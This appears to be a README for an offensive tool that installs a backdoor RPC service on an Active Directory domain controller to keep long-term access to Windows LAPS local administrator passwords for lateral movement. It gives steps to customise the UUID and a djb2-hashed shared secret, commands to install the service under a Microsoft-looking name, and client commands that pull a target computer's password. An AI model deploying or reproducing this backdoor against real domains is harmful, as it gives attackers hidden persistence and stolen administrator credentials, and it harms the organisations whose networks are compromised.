A way to maintain long-term access to Windows LAPS for lateral movement in AD via installing an Offensive LAPS RPC backdoor on a DC.
Compile the project optionally replacing:
- The UUID in RPC IDL (default is
12345678-1234-1234-1234-1234567890ab) in Server.idl. A custom one can be generated with Python aspython -c 'import uuid; print(uuid.uuid4())'. - The shared secret
SHARED_SECRET(default is0x78ec3379which corresponds to0123456789abcdefauthentication key) in Server.cpp. A custom one can be calculated with Python as:
def djb2(s):
h = 1337
for x in s:
h = ((h << 5) + h) + x
return h & 0xFFFFFFFF
print(hex(djb2(list(bytearray.fromhex('0123456789abcdef')))))
# '0x78ec3379'Install Offensive LAPS RPC backdoor as a service on a DC:
lapsutil.dll must be put in the same directory with the Server binary!
Cmd > Server.exe -install
Cmd > sc start MicrosoftLaps_LRPC_0fb2f016-fe45-4a08-a7f9-a467f5e5fa0bRequest a Windows LAPS password providing the authentication key, the target computer DN and the DC IP or hostname:
~$ python client.py -key <AUTH_KEY> <COMPUTER_DN> <DC_IP[:PORT]>
~$ python client.py -key 0123456789abcdef 'CN=PC01,OU=Computers,DC=contoso,DC=local' 127.0.0.1:31337Cmd > Server.exe -console
Cmd > Client.exe <DC_IP[:PORT]> <AUTH_KEY> <COMPUTER_DN>
Cmd > Client.exe 127.0.0.1:31337 0123456789abcdef "CN=PC01,OU=Computers,DC=contoso,DC=local"